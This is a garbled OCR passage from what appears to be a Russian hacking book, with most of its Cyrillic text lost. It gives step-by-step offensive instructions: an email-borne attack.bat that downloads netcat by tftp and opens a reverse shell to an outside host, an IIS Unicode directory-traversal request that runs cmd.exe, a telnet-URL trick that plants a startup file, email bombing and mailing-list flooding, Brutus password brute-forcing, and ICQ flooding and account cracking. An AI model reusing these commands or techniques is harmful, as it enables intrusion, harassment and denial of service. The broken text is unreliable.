type="multipart/alternative";
boundary ="1"
X_Priority: 3
X-MSMail-Priority: Normal
X-Usenet : 1
Content-Type: multipart/alternative; boundary =" 2 "

2
Content-Type: text/html; charset="isc 8859-1"
Content -Transfer-Encoding: quoted-printable
<HTML>
<HEAD>
</HEAD>
<BODY
bgColor=3D#ffffff>
<IFRAME src=3Dcid:THE-CID height=3DO width=3DOx/IFRAME>
, . <BR>
. <BR>
</BODY>
</HTML>

Content-Type: audio/x-wav; name=" attack. bat"


Content -Transfer-Encoding : quoted-printable

Content-ID:

<THE-CID>

start / /WAIT tftp -i alex-3.sword.net get nc.exe


C: \winnt\system32\nc .exe
start /B nc.exe -d -e cmd.exe alex-3.sword.net 2002

quit

:
start / /WAIT tftp -i alex-3.sword.net get nc.exe C:\winnt\system32\nc.exe
start /B nc.exe -d -e cmd.exe alex-3.sword.net 2002
. MS-DOS MS-DOS
( / start) ( /WAIT start). MS-DOS
tftp, ( put)
( get). ( tftp Windows 2000/XP.) tftp ( -i) nc.exe alex-3.sword.net c:\winnt\system32 .
- netcat,
cmd.exe
- netcat, 2002.
. attack-tftp.txt - 9.3, .
Alex- TFTPD32,
TFTP, .. , TFTP.
TFTPD32 , Windows 2000/XP,
UNIX, TFTP ,
tftp ,
, tftp - .
, TFTPD32 ,
. 9.2.
TFPD32 . Base Directory
( ) nc.exe,
Server interface ( ) IP-
, , - Alex-. . 9.2, TFPD32 69 TFTP
.


[Fig. 9.2. TFTPD32 by Ph. Jounin: Base Directory C:\test\netcat, Server interface 1.0.0.5, Current Action "Listening on port 69"]


MS-DOS - :
nc -vv -L -p 2002
listening on [any] 2002 ...
netcat, , 2002, .
. MS-DOS
1-1
SMTP- sword-2000.sword.net :
type attack-tftp.txt | nc -vv sword-2000.sword.net 25
Outlook Express 5.00
( 1-1
MS-DOS), TFTPD32 , . 9.3.
[Fig. 9.3. TFTPD32 by Ph. Jounin (Base Directory C:\test\netcat, Server interface 1.0.0.5) logging the transfer:
Connection received from 1.0.0.7 on port 1125
Read request for file <nc.exe>. Mode octet
<nc.exe>: sent 118 blks, 5932 bytes in 1 s. 0 blk resent]


MS-DOS,
netcat,
1-1 (. 9.4).
[Fig. 9.4. Command Prompt running "nc -vv -L -p 2002": after "connect to [1.0.0.5] from ALEX-1 [1.0.0.7] 1274" a Microsoft Windows 2000 prompt appears, and ipconfig run in it reports IP address 1.0.0.7 with mask 255.0.0.0]
, - , . 9.4
ipconfig, IP- ,
. - , ,
- , 1-1
! - !
- ,
,
.

BcmaBku koga
[4]:
.
, - .
.
.
.
.



[4] , . , ,
. , 2000
, GMT.
,
IMAP. Service Pack 1 Windows 2000.
, ,
.vcf ( vCard) .asx ( Media Player).
[3] - , .


- , , - ..
. ,
, ,
,
-, MS Office (, - !) . - ,
,
.
, -
!

AokaAbHbix
, , , ,
,
. ,
, Web-, . HTML , ,
, , ,
8. Web- (Georgi Gunninski) http://www.guninski.com.


Omkpbimue
,
- - , -,
.
, , hacker.com, netcat
:
nc -n -L - 80 -t -w 1 < attack.bat
netcat TCP 80,

attack.bat .
netcat,
HTML, :
<raroe src=telnet:-f
%20"Document%20aiid%20Setting\aAll%20\Users\start%20inenu\
programs\startup\start.bat"%2Ohacker.com%20 8 0 >

,
, .
telnet, telnet,
, Windows 2000, SFU 2.0 (Service for Unix - Unix). f:, telnet.
telnet SFU :
(Address) IE URL telnet:-f%20\filename.txt%20 host
IE - filename.txt. , telnet ,
start.bat
attck.bat. start.bat - !
- telnet SFU 2.0,
. , ,
.

\I\I\I\IM\I

, , -


Microsoft - , . .
, , Web-, ,
Hotmail Microsoft (http://www.msn.com) Yahoo
(http://www.yahoo.com). Web-, ,
, , Web .
Web-, .
, , , , -,
, Received:
(. 9.1) ,
( ). -, WWW
.
WWW ,
, , .
, Web- , ActiveX - . 8.
...

, ? , ,
:
, .
.
- , , .

.
, , .
-
. 1 - .

10.


9 , ,
, .
, , , ,

. ,
, ,
,
,
.


, . , , 9, .
, , , ,
,
... , - !

- (, , , 1,
). ,
,
,
! ,
. ? -
-
- .
( Flood - ,
) ( Spam - , . Spam ). (..


), , ,
.
, SMTP-. Death & Destruction
Email Bomber ( & ) 4.0,
DnD (http://www.softseek.com/Utilities/VBRUN_Files/).
, . ,
DnD, .
Avalanche - . Avalanche DnD, .
. 10.1 DnD 4.O.
[Fig. 10.1. Main window of DnD with menus Clones, Headers, Session, Random Lists, Mailing Lists, Window, Extras and Help; fields "Send bomb to", "Say bomb is from", "Message Subject" and "Message Body", each with "Randomly Change" and "Edit List" controls; settings "SMTP Host", "Spoof Host", "# of messages to send" and "Never ending bomb"; buttons Send Bomb, Edit Headers, Abort, Clear and Clone; and the author's note that email bombing mainly harms SMTP hosts]


DnD, , 1-1
, . , ( ).



.
.


DnD Settings
(), DnD (. . 10.1).
DnD Settings ()
:
> SMTP Host ( SMTP) , SMTP-, . SMTP Sword-2000.sword.net.
> Spoof Host ( )
, .
, .
Randomly Change ( ) ,
SMTP.
> SMTP-,
Edit Server List ( ).
Random Server List ( ),
. 10.2.
[Fig. 10.2. "Random Server List" dialog with a grid of SMTP server names]
SMTP-
Random Server List ( ) .
Submit ().
Size of Bomb ( ) (. 10.1) :


# of messages to send ( )
.
10.
Never ending bomb ( ) .
, . , . E-Mail bomb ( ).
> Send Bomb to: ( :) , kolia@alex-1.sword.net.
> Say bomb is from: (, :) ( , ) . From ().
, Randomly Change ( ) , .
Edit List ( ).
> : () , , .
> Message Subject ( ) .
, Randomly Change ( )
.
Edit List ( ).
> Message Body: ( :) .
> , Random () - Message Body
( )
. , -
.
Abort () ,
Clear () - E-Mail bomb ( ).
.
> Send Bomb ( ) . ,
. 10.3.

[Fig. 10.3. Countdown dialog: number of messages to be sent 10, number sent so far 10, the times when the bomb started and finished, the status "Bomb completed!" and an "SMTP Spy" button]


, Countdown () , 10
, . , SMTP, , SMTP Spy ( SMTP)
SMTP Spy ( SMTP), . 10.4.

[Fig. 10.4. SMTP Spy window showing the server replies:
250 hello sword-2000.sword.net
250 ok
250 ok its for <kolia@alex-3.sword.net>
354 ok. send it; end with <CRLF>.<CRLF>
250 Message queued
Note in the window: Ignore "Command unrecognized" and "need MAIL first". As long as you get a "message accepted for delivery" its fine.]


SMTP Spy ( SMTP) DnD
( DnD SMTP- - !) .
SMTP ( ), Email bomb ( ) (. 10.1) -
MIME- Headers (),
Edit Headers ( ) . 10.5.

Fig. 10.5. MIME [Edit Headers dialog: X-Mailer, X-URL, X-Sender, X-Date, Return Path, References, Priority, X-Authentication Warning]


, ,
MIME , 9.
- DnD
,
, .

Attack
, DnD , . , ,
.
, Clone ()
E-Mail bomb ( ) Bomber Spawn 1 (
), . 10.6.
, Bomber Spawn 1 ( ) E-Mail bomb ( )
-
SMTP-. ,
SMTP-. - - , !
- .

Fig. 10.6. [Bomber Spawn 1 window]
, , ( - ).
> , DnD Clones * Load Multi Clones ( *
). Number of clones ( ),
. 10.7
Fig. 10.7. [Number of clones dialog]
- !
> Number of clones ( ) ( 5-6) .
Bomber Spawn
( ), 1 -
. Send Bomb ( )
. -
!


cnuckaMu paccbwku
! , - ,
! DnD
, , Mailing lists ( ). Subscribe
joe lamer to mailing list ( ),
. 10.8, ,
Euro Queer ( ), Mormons (), Family Medicine
( ) -
!

Fig. 10.8. DnD



DnD
. Target
Email Address ( ), Subscribe em
() - . , .


,
, DnD , ,
, . ,
Extras * Pword generator ( * ).
Randomic Password Generator ( ), . 10.9.


, How many characters? (


?) ( - 8 )
: Use Both ( ) - , Use numbers ( ) - Use letters ( ) - . -
, ,
.
Fig. 10.9. [Randomic Password Generator dialog]
Extras () -
SMTP- ( SMTP Remote (
SMTP)), ( Raw Port
( )). , ( , SMTP).
Other Tools ( )
.
- , , .
, - ;
. ,
, . , ( ). , .

k


. , ,
- (


IMAP) , .
- .
Brutus Authentication Engine Test 2
( Brutas , 2),
Brutus AET2 (http://www.hobie.net/brutus). . 10.10
Brutus,
, FTP, HTTP, Telnet
NetBus.
Fig. 10.10. Brutus


,
Brutus ( 12
Brutus IIS). , alex-1.sword.net,
kolia. , ,
- ,
.
.
> Brutus - 2 (. 10.10) Target () , alex-1 .sword.net.
> () ,
.


>- Connection Options ( ) Use Proxy ( ),


-
.
> Authentication Options ( ) Single User ( ) -
.
> User file ( ) , .. - kolia.
> Pass Mode ( ) Brute Force
( ). Brutus ,
. 10.11.
Fig. 10.11. Brutus POP3



Range (). Range () Brutus Brute Force Generation (Brutus - ),
. 10.12.

Fig. 10.12. [Brutus - Brute Force Generation dialog]
Brutus - Brute Force Generation (Brutus -
) - ,
, . ,
- , Min Length ( ) 3, Max Length ( ) - 4. , Digits only
( ).
.
> Start () Brutus - 2
Brutus - 2. . 10.13.
Fig. 10.13. !


Positive Authentication Results (


) , kolia - 0007.
, Brutus 10997 alex-1.sword.net (
11000). 5 Pentium 3
1000 ,
Ethernet 10 /.
,
, Brutus (
). -, , , ( 8 !),

, (, &$ ..).
!
Brutus - Brute Force Generation (Brutus - ) 8 ,
Full Keyspace ( ). Start
() Brutus - 2
- 6 095 689 385 410 816 - , !
12 ?
, , ,
(., , [10]). Brutus,
Pass
Mode ( ).
( 100 000), ,
. , password, parol, MyPassword
- Web- -
.
-,
,
, Ethernet, 30-50 / (
). -
. -
, - , ,
,
.

. , , , , ,


, . .

- , .
IIS Brutus 12 ,
- . ,
, . , , ,
- , -
! :
!. .


, , ,
. 1, , , , . - ,
, , ,
. ,
- ( - ),
.
, - ,
. . ,
TFTP 1-1 , 1-1 . , TFTP
, .
TFTP
, ,
, . , , , ,

,
.

. , ,
( ) . ,
, , Web- - .. ( ,
). . - , , , IP-.
. - , ..
,
- , ,
. , ..
, -
-
. , 2002 ., , ,
.
Web-. . . ...
(
). Web-, ,
?, .
, , ?, ?,
? . -
, ,
, ,
. , , , , ,
. ,
, - ,
, .
repa_parenaia, - !


- . , , ,
,
. - , , ,
- , . .
, - .
,

. , (
) , -
!
.
,
8 ( 12) , , .
,
DnD .
.
, - , Norton Antivirus
MacAfee VirusScan.
,
- PGP Desktop Security.
, .
, - , ,
, .

- - , .

11.

Hacking ICQ
ICQ Intelligent Call Query, . ICQ [--] : I Seek You - ; , ICQ .
ICQ ,
1998 Mirabilis,
( 40 ) AOL.
ICQ ,
ICQ ,
, . , , ICQ,
,
. , , - .
ICQ ,
ICQ.
ICQ , ICQ, ,
http://www.ICQ.com, http://mirabilis.com. ICQ - ICQ , , 1998, 1999, 2000,
2002, ICQ 2003. ICQ
UDP, 4000, -
TCP, .
, ICQ, UIN (Unique Identification Number -
). UIN -
ICQ , .
, ICQ?
ICQ ,

. , ? .


AcbkuHbi
-,
ICQ,
. -, ICQ ICQ
.
, ICQ, :
, UIN ,
, . , ICQ , - ICQ . , , - .
ICQ-, , IP-
ICQ-, , . , , DoS, 13 . ,
IP- ICQ, -
, ICQ- .
!
, ICQ-,
. ,
,
, - ,
.
ICQ,
Mirabilis
. ICQ, ICQ ,
.
,
.


ICQ
,
, ,
, ,
.

, /. .
. - ,
ICQ
ICQ ICQ. ,
ICQ ; , ICQ- (,
LameToy
www.mirabilis.com). , ( )
,
.
. Sword-2000
ICQ Groupware Server, Alex-
ICQ Groupware Client, UIN, 1001, 1-1 ,
UIN, 1003. ICQ Groupware
http://www.icq.com.
ICQ, ICQ
Groupware, ,
, 1. - , ICQ - ,
ICQ
. ICQ
ICQ-,
ICQ-, ICQ- .


UIN
UIN ICQ- ULN ICQ, , UIN . UIN

. ,
, - .
- - , .
, , .
( ) LameToy for ICQ
(DBKILLER), , , ( http://icq.cracks.ru/attack.shtml). LameToy for ICQ , , .
LameToy for ICQ.
. 11.1 , LameToy
for ICQ.
Fig. 11.1. LameToy for ICQ (DBKILLER)


ICQ

LameToy for ICQ (DBKILLER) -
Send (). , Setting
() Loop () ,
. TJIN,
UIN# - Ran (Random- ). ,
, , , .


, ICQ-,
- , UIN UIN
. , ICQ (ICQ99a
ICQ99b) . DB-
( - ), DB Data Base - , ,
DB NewDB. LameToy ,
DB killer ( DB)
Setting ().
ICQ, .
, , LameToy, UIN , , , System Messenger - ICQ Team (http://www.icqinfo.ru/soft_icqteam.shtml), ICQ Sucker
.

IP- ICQ-knueHma
DoS ( ) ,
- . ,
, , Advanced ICQ IP
Sniffer - ICQ Team ( Web, , http://www.icqinfo.ru/softjcqteam.shtml).
. 11.2 Advanced ICQ IP Sniffer.
Fig. 11.2. - IP- ICQ


IP- ICQ UIN, Advanced ICQ IP
Sniffer ICQ, UIN . , , Your UIN ( UIN) Password
() Advanced ICQ IP Sniffer ( IP
ICQ). Check ()


, ICQ
UIN , Info
() .
, Info () . 11.2
, ( ) IP- ICQ,
TCP-, ICQ . , , Ext IP ( IP), Int
IP ( D?) TCP Port ( TCP). ,
ICQ- ( ).
ICQ, Advanced IP ICQ Sniffer,
ICQ server's address and port ( ICQ),
Server () . 11.3.
Fig. 11.3. ICQ server's address and port


( ICQ)
ICQ server's address and port (
ICQ) Mirabilis
ICQ - 4000. ,
/ IP- /
.

ICQ-
ICQ, , , ICQ-,
ICQ-
ICQ. , , . ,
ICQ, ICQ-MultiWar
(http://www.paybackproductions.com/), - ICQ Flooder
(. 11.4).

Fig. 11.4. ICQ


ICQ Flooder, .
> Victim's address ( ) -
ICQ.
> ICQ-port ( ICQ) TCP.
> , UIN .
:
UIN - Randomly generated UIN
( UIN), UIN UIN.
UIN - Apparent source UIN
. ( UIN ) UIN, ICQ .
> No. of Messages ( ) ICQ-.
v Message () (- , ).
> Send! () .
- , ICQ, , - , ,
http://mht.hut.ru/icq/icq.html,
( , , -


ICQ , ). ICQ - ,
, , -
!

ICQ
ICQ,
ICQ, ,
. ,
, .
brute
force - , ,
.

.
, , ICQ subMachineGun v1.4 (http://icq.cracks.ru/best.shtml), . 11.5.
Fig. 11.5. ICQ subMachineGun


UIN ICQ


ICQ ICQ subMachineGun


.
> ICQ subMachineGun.

> Settings * Connections&Cracking (&). , . 11.6.

Fig. 11.6. UIN


> icq server ( ICQ) ICQ,
, ICQI.mirabilis.server.
> port () 4000.
> Cracking ()
:
Stop if successful ( )
ICQ.
Make log if cracked uins ( UIN) ICQ.
Reconnect if timeout (
) ICQ
.
Cut password length to 8 digits (
8- ) 8- .
> set timeout ( ) 15 .


> relogin ( ) ICQ


3.
ICQ subMachineGun
UIN . .
> ICQ subMachineGun Bruteforce
( ) UIN. .
Single () UIN, .
Single () UIN.
> UESf,
(...) Making victims list ( ),
. 11.7.
Fig. 11.7. UIN


Making victims list ( ) Range
() , , UIN ( - 100000) ( 900900).
step () UIN ( - 100).
Generate () UIN;
.


, Generate ()
- UIN, , , ..
Add () UESF .
>

UIN,
Open () UIN ( UIN ).

> - UIN ,
I0**18]. Clear () UIN ( ).
UTN,' .
.
>

ICQ subMachineGun Bruteforce ( )


. .
Single () , .
Single () .

> ,
(...) Make passlist (
), . 11.8.

. 11.8.
Make passlist ( )
.


> Open ()
( ).
- ,
ICQ.
> Generator ()
Add (). , .
> , I08'"'!. Clear ()
( ).
> , .
.
Force (). , ICQ
subMachineGun v1.4 (. 11.9).
Fig. 11.9. -

ICQ subMachineGun v1.4,
UIN, ( , . 11.9 ). , , 15 , ICQ.


- 45
, ( ). ,
, , , , .. - .
...

ICQ-kpkep
-, , ICQ -
. ICQ , ICQ . ,
? - ! ,
? ,
ICQ- , .
,
.
?
,
Windows.
,
2 . , ICQ ,
ICQ. ICQ-, , ElcomSoft
Advanced ICQ Password Recovery (http://www.elcomsoft.com).
, .
. 11.10 Advanced ICQ Password Recovery.

Fig. 11.10.
ICQ .dat

> ICQ, Advanced ICQ Password Recovery (


ICQ) .dat, ICQ.
, ,
ICQ 2002 2002. 2002 , UIN .dat, .., ,
207685174.dat (207685174 - UIN ). ICQ Password successfully found! ( ICQ ), (. 11.11).
. 11.11 ,
ICQ 99 - 2000,
ICQ 2002 ( ).


, . .. !
ICQ
, - , - ICQ-. (. 6), , (. 9), Web- (. 8).
, ,
, .


, ICQ
( ) , . , ,
,
ICQ. , ,
ICQ - ,
- . , .
ICQ,
.
. , , ICQ- - ICQ . ,


ICQ , UIN . -

?
, , , - ,
. , , - , , , ,
, , - . ICQ - , , ,
,
, , , , .
- , ..
ICQ, , , . , ICQ
ICQ, ICQ ( , ICQ Team
(http://www.lcqteam.com)). ICQ- ICQ, ICQ- - ICQ.

- , .
, ? ,
, . ,
- , ? , ... ,
, , .
ICQ-, -

,
.

ICQ ,
. ICQ -
, -


ICQ-. ICQ
DoS ...
.
ICQ
. -, ,
ICQ-, ICQ-, ICQ- .
ICQ,

ICQ. IP- , ,
ICQ. ICQ .
, ICQ-, UIN
. , ICQ-, -, , BlackICE Defender,
DoS. -
, , .
,
. ,
ICQ -

.
-, -
ICQ, ICQ. , IP- ICQ-,
- . ,
.
, . ICQ , PGP Desktop Security 2.9,
ICQ-
. ,

PGP- ( [7]).

4.
Hacking the Web
Web , Web
. ,
- , , .
Web , , , , .
, , , , , Web , ,
Web - ,
. Web - , . , Web

, .
Web,
, . 12 , ,
Web,
Web-. Web
, . ,
, DoS -
, Web- - - .
13 DoS
.

12.

Hacking Web Sites
Web? , Web
,
. Web-
, Web- .
, , , .
, Web-
, ,
, , .
HTML Web-
( - ),
, . HTML
.

(
).
, Web-, , Web-,
, . HTTP, , , .
Web-,
, .
, Web-, DoS
,
, Yahoo.
,
Web-, , ( ) Web- ,
. Web , .

Web-
Web
Web , , Web, Web,



, .

Web - Web, Web . Web - , Web, Web . Web


, .
Web - Web,
, Internet Explorer (), -
HTML Web-, HTTP,
Web ( ).
Web , IIS Microsoft, Apache HTTP Server Apache Software Foundation
. Web,
ASP (Active Server Page - ) CGI,
, Java SUN,
Apache Software Foundation . ( CGI, CGI- Web-.)
Web, Web,
, . SQL Microsoft, Oracle Oracle .
, , , -
ODBC (Open Data Base Connectivity -
).
- , , , , , ... ?

xakimza Web-
,
Web-,
. ,
.


Web- - ,
, , , , Web .
Web- - Web- ,
, TCP- 80, , Web-,
( CVE, Web-), Web- - .
Web - - ASP, Java, CGI -
, .
Web - , -,
, -, ( !).
, , - . , , (cookie),
, .
- Web-
, , . , , CGI- , -
CGI- , , , .
- ,
Web- ; .
- , Web-
,
, -
.
- , , ,
Web-, Web-, .
, (, . [11]).
, , , , IIS 5. ,
(


HTTP), CGI- (
) Web ( Web).

Web- , .
IIS , Web-,
. , Web- ,
- , .
- , Web-. - . , FTP- , , .
, .
Web- .

Web-
,
Web-,
. , , ,
, . , , .
, Web- , IP- , , DNS-,
.
Web.
,
.


Web-
.
.


-, ,
-- ,
. IP-, , ,
.
.
-, HTML- Web- . HTML , Web, , .
, , , , JavaScript . , HTML- Web
Web- Teleport Pro.
, , Whois - , ,
Web.
whois (
Unix), Web- , whois Web-.


. , ,
. 1999
- Network Solution (http://www.networksolution.com),
, , InterNic (http://www.internic.net). / .
Web-,
Whois ( ),
. Whois
, ,
, DNS
. ,
RIPE NCC (Network Coordinate Center - ),
-
. Web- RIPE NCC (http://www.ripe.net),
. 12.1.


? - IP-
DNS - .

Fig. 12.1. Web- RIPE NCC


IP- Web-


,
SuperScan (http://www.foundstone.com),
. 12.2.
Fig. 12.2. [SuperScan window]

SuperScan, .
> Start () IP- .
> Stop () .
> Scan type ( )
All list ports from ( ).
> Start ().
SuperScan . , IP- 1.0.0.1 HTTP IIS 5.0, - Web. (
),
.

Legion
(http://packetstormsecurity.org/groups/rhino9),
IP- 1.0.0.1 . 12.3.

Fig. 12.3. IIS 5
, IP- IIS 5,
- , ? .

IIS 5
IIS ,
HTTP (Hypertext Transfer Protocol - -


) CGI (Common Gateway Interface - ), IIS, .


HTTP , - Web . HTTP , GET. Web- (, ), GET, , ,
http://www.anyserver.com/documents/order.html.
order.html /documents IIS,
c:\inetpub\wwwroot\documents.
CGI , . HTTP, :
http://www.anysite.com/scripts/MyScript?parameter1+parameter2
MyScript - , /scripts IIS,
?+2 , MyScript. IIS ,
,
,
.
CGI, ASP
(Active Server Pages - ) ISAPI (Internet Server
Programming Interface - ). ASP :
http://www.anysite.com/scripts/MyScripts?parameter1=value1&parameter2=value2
MyScript.asp, , , HTML. ISAPI
, ISAPI. HTTP:
http://www.anysite.com/isapi.dll?variable1&variable2
, IIS, , .

HTTP
HTTP ,
IIS . IIS 2.0 :


http://www.anysite.com/../../../../../winnt/secret.file
Web- , secret.txt.
- Windows, ACL.
IIS , Web-
[3]. IIS
, , , , ,
SecurityLab.ru (http://www.securitylab.ru).
IIS,
netcat (http://www.atstake.com), 9
(netcat - -
[3] netcat IIS).
netcat Sword-2000
, . netcat .
>

Alex- netcat,
nc -vv 1.0.0.1 80

>
GET / HTTP/ 1.0 iP^l. . 12.4.
C:\test\netcat>nc -vv 1.0.0.1 80
DNS fwd/rev mismatch: SWORD-2000 != sword-2000.sword.net
SWORD-2000 [1.0.0.1] 80 (http) open
GET / HTTP /1.0
HTTP/1.1 400 Bad Request
Server: Microsoft-IIS/5.0
Date: Fri, 28 Feb 2003 12:55:40 GMT
Content-Type: text/html
Content-Length: 87
<html><head><title>Error</title></head><body>The parameter
</html>sent 17, rcvd 224: NOTSOCK
C:\test\netcat>

Fig. 12.4. GET IIS netcat


GET / HTTP/1.0
IIS. . 12.4, HTML, .
, GET <.
GET.txt :


GET / HTTP/1.0
[CRLF]
[CRLF]
[CRLF] . netcat .
nc -vv 1.0.0.1 80 < get.txt

get.txt, . 12.4.
( .)
, . ddcode.txt .
GET /scripts/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\ HTTP /1.0
[CRLF]
[CRLF]
1-1 Windows
2000 ( ).
netcat :
nc -vv 1.0.0.7 80 < ddcode.txt
. 12.5.
Fig. 12.5. 1-1 !
, 1-1
! Sword-2000 ( Windows 2000 Advanced
Server Service Pack 2) - Microsoft , 2000
. ,
URL ,


(. [3], [4], [11]).


, . Windows 2000 ?
- ,
? ,
.


Web-, IIS, -
, Web-.
, Web- CGI (Common Gateway Interface - ), , Web .
CGI, , .
Web-,
.., IIS, System, . .
, CGI- ;
, . , -
, ,
, . ,
-
.
, , Perl, , ., , , ,
, , , . , - , , Web, - . , , CGI-, , Web-,

.


CGI-
D@MNED CGI Scanner 2.1 (http://shieldandsword.narod.ru/soft/scansec/scansec.htm). . 12.6 ,
.
Fig. 12.6. CGI- D@MNED CGI Scanner 2.1


, D@MNED CGI Scanner 2.1.
Scanners log ( )
. , , , .
Scan list ( ), . 12.7, , .
,
, .
. , ,
.
, .
Scan subnet ( ) IP-, . , : 234.56.78.1 - 8.

Fig. 12.7.

Fig. 12.8.
CGI-

CGI holes ( CGI) (. 12.8) CGI-,


.
, ,
,
Scan list ( ).
Spy () (. 12.9),
Web- ( - IIS 5.0),
( ).
Fig. 12.9. CGI- !


Option (), . 12.10,
-, . - -
- -,
- ( , ...).
Fig. 12.10. CGI-


D@MNED CGI Scanner 2.1 .
1-1
IP- 1.0.0.7, .
> Scan list ( )
http://www.altavista.com IP- 1.0.0.7.
> Scanner log ( ) . ,
. 12.11.
Fig. 12.11. IIS 5.0


( . 12.11 200 500) ; . , 200 - ,
500 - . 200 (
- SUCCESS)
.


, D@MNED CGI Scanner 2.1



. , ,
. ,
1, , MITRE CVE
(http://www.mitre.org). , . 12.11, IIS .htr .idq.; MITRE.
CVE-2001-0500
Buffer overflow in ISAPI extension (idq.dll) in Index Server 2.0 and Indexing Service 2000 in IIS 6.0 beta and earlier allows remote attackers to execute arbitrary
commands via a long argument to Internet Data Administration (.ida) and
Internet Data Query (.idq) files such as default.ida, as commonly exploited by
Code Red.
( ISAPI (idq.dll) Index Server 2.0 Indexing Service 2000 IIS 6.0 -
.Ida (Internet Data Administration -
) .idq (Internet Data Query - ),
, default.ida, Code Red.)
Reference: BUGTRAQ:20010618 All versions of Microsoft Internet Information
Services, Remote buffer overflow (SYSTEM Level Access)
Reference: MS:MS01-033
Reference: CERT:CA-2001-13
Reference: BID:2880
Reference: XF:iis-isapi-idq-bo(6705)
Reference: CIAC:L-098
, CGI- IIS
- IIS. , ,
http://www.securitylab.ru. ,
, .
" IIS .htr
, Web . "" , .htr (ISM.DLL).
IIS 4.0 5.0 SP2 1 2002.
IIS - , ,


. ISAPI , .htr , ISM.DLL.


ISM.DLL . IWAM_COMPUTERNAME.
. IIS 4.0-5.1."
, SecurityLab.ru Unix Pylon, . ,
, ( ,
).
CGI Vulnerability Scan (http://www.wangproducts.co.uk),
. 12.13.

Fig. 12.12. CGI Vulnerability Scan



CGI-, ,
- .

,
,
SecurityLab.ru
(http://www.securitylab.ru), IIS ( ),
IIS.
, , HTTP - . -


Web-? - HTML- Web-, . HTML,


Web, HTML .
Web . , , Teleport Pro (http://www.tenmax.com),
Web .
Teleport Pro.

The Teleport Pro Web spider


Teleport Pro Web-, Web- . Teleport Pro , ( ), , Web Web-.
, ,
- spider - .
Web-
Web - . , , , . Teleport Pro .
Web-
.
Web-, ' .
Web- .
Web-.
Web-, Web-.
Web- .
Web-.
Teleport Pro , Web ,
.


Teleport Pro , , Web.


, , Web.
Start () - , Teleport Pro ,
Web, Web-, , .

Web
. , Teleport Pro Web
, .
Web- , Web, .
Teleport Pro . 12.13.
Fig. 12.13. Teleport Pro


Windows
Teleport Pro
,
.

project
.
> Teleport Pro File New Project Wizard
( * ). (. 12.14).

Fig. 12.14. [New Project Wizard]
Teleport Pro
. 12.14
Teleport Pro.
Create a browsable copy of website on my hard drive - Web- .
Duplicate a website, including directory structure - Web-,
.
Search a website for files of certain type - Web- .
Explore every site linked from a central site - ,
.
Retrieve one or more files at known addresses -
.
Search a website for keyword - Web- .
> -
Web- . ,
Next ().
(. 12.15).
> Web;
, New Address ( )
.

Fig. 12.15. [Starting Address]
Web
Up to ... links from this starting point ( ...
) Web , ( 3).
Next ()
(. 12.16).
Fig. 12.16. [New Project Wizard - Step 3 of 4: Project Configuration]
> . 12.16 , Web
. :
Just text ( ) - .
Text and graphics ( ) -
.


Text, graphics, and sound (, ) , .


Everything () - .
> , , Account ( ) , Password
() - .
> Next ()
(. 12.17).
Fig. 12.17. ! [New Project Wizard - Step 4 of 4]
. 12.17 , Start ()
Start () Project ().
> Finish () (. 12.18) .
Fig. 12.18.
Teleport Pro

,
. , ,
Teleport Pro 1.29.1959 HTTP FTP.

Configuring project properties


Project
Properties ( ), . 12.19
Project Project Properties ( * ).
Fig. 12.19. [Project Properties: Browsing/Mirroring tab]

Project Properties ( ) , . , Browsing/Mirroring (/
), . 12.19.
Browsing/Mirroring (/ )
,
, ,
,
. .
Always save HTML pages ( HTML) Teleport Pro HTML, .. Web-,
, ,


Web, . , Web-
, ,
Web- .htm .html.
Replicate the directory structure of remote servers (
) , .
,
, .
Use MSIE-compatible filenames (append .htm to HTML files where
necessary) ( , 8 (
.htm HTML)) IE ,
HTML, .htm .html (, .shtml .pi). ,
, Teleport Pro
HTML, .htm .html,
.
Linkage System ( ) , , ,
. Localize links for all retrieved files
( ) ,
, Web.
:
Link to a message that explains why the file was not retrieved -
, , . , ,
, .
Link to the Internet address for the file - .
,
.
Link to a place where the local file will be stored - ,
, ..
Web .
Web- , .


.
Teleport Pro
HTML- , , , ,
Java, . , -
.

Linkage System (
) Link using 8.3 filenames (, 8.3) , DOS . , ,
8.3.
Relink all files in the project now ( )
HTML
, .

HTML code
, , , Web-. HTML
Web-? , Web- , ,
Web-. , Web, HTML.
?
-, - ,
. , , , - ,
. , - .
-, - , , - , , . ,
, CGI, , , Web-. HTML
CGI-,
.
, .
, . , - .


, ,
, , Web , ,
Retina (http://www.eeye.com/html/Products/Retina/). ,
Teleport Pro (http://www.tenmax.com) HTML-
, Web.

k cmpammkaM Web
, Web ? ,
Web, ,
- . HTML, HTTP.
, , .
Web-,
.
- ,
Web- ,
/ Administrator/password
( , , [3] , (!!!)
Web).
, , Brutus Authentication Engine Test 2 ( 2), Brutus AET2 (http://www.hobie.net/brutus), 10, .
, HTTP.
. 12.20 Brutus.
IIS
Sword-2000, .
> Target () IP- , 1.0.0.1.
> ()
, . HTTP (Basic
Authentication) (HTTP ( )) -
HTTP, ( IIS
Windows IIS).

Fig. 12.20. Web-


Authentication Options ( ) , . Administrator,
Use Username ( ),
Single User ( ).
> Pass Mode ( ) Brute
Force ( ), , .. .
> Range (). Brutus - Brute Force Generation (Brutus - ), . 12.21.
Fig. 12.21. [Brutus - Brute Force Generation dialog]
Brutus - Brute Force Generation (Brutus -
) - ,
IIS .


; Min Length ( ), Max Length ( ) - 3. ,


Digits only ( ).
.
> Start () Brutus - 2 (. 12.20) . Brutus - 2 . 12.22.
Fig. 12.22. IIS !


, IIS , . 12.23, ,
.

Fig. 12.23.
Web

, Brutus , Web. CGI- Web-. () HTTP


(Form) (HTTP ()) GET ,
, ,
, .

Web, , - . Web
, . , , . , Windows NT/95/98,
Web- CGI Vulnerability
Scan D@MNED CGI Scanner 2.1, ,
, Web, ,
.
, Web-, , ,
. Web - ,
Web- .
, Web- - , Retina, , , [7]. Web- -
,
.

13.

DoS Attacks
, TCP/IP, TCP/IP , . , , - ,

DoS (Denial of Service ). DoS -, TCP/IP .
DoS , . DoS ,
, Yahoo, eBay, CNN.com, www.Microsoft.com,
, [3].
, , , , .
DoS ,
,
, , .
, [3], DoS
,
. ., , , , DoS Web-; , DoS
. ,
, - , DoS.
DoS,
, .


.
6 , DoS
,
.
DoS , ,
, , - -

IDS
(,
BlackICE Defender
(http://blackice.iss.net/)), .

DoS attacks
DoS ,
.
, , DoS .
- ,
, , ( Web- Yahoo).
. , , 1 ( 1544 /), , , 56 / ( ).
- ,
, , .

.
- ,
.
- , ,
.
- , .
,
.


- ,

, .
.
DoS , , .

Attacks
,
. 1, Web- [3],
, .
, , .
, . , - UDP ICMP.
DoS, , ,
/.

.

UDP
, UDP
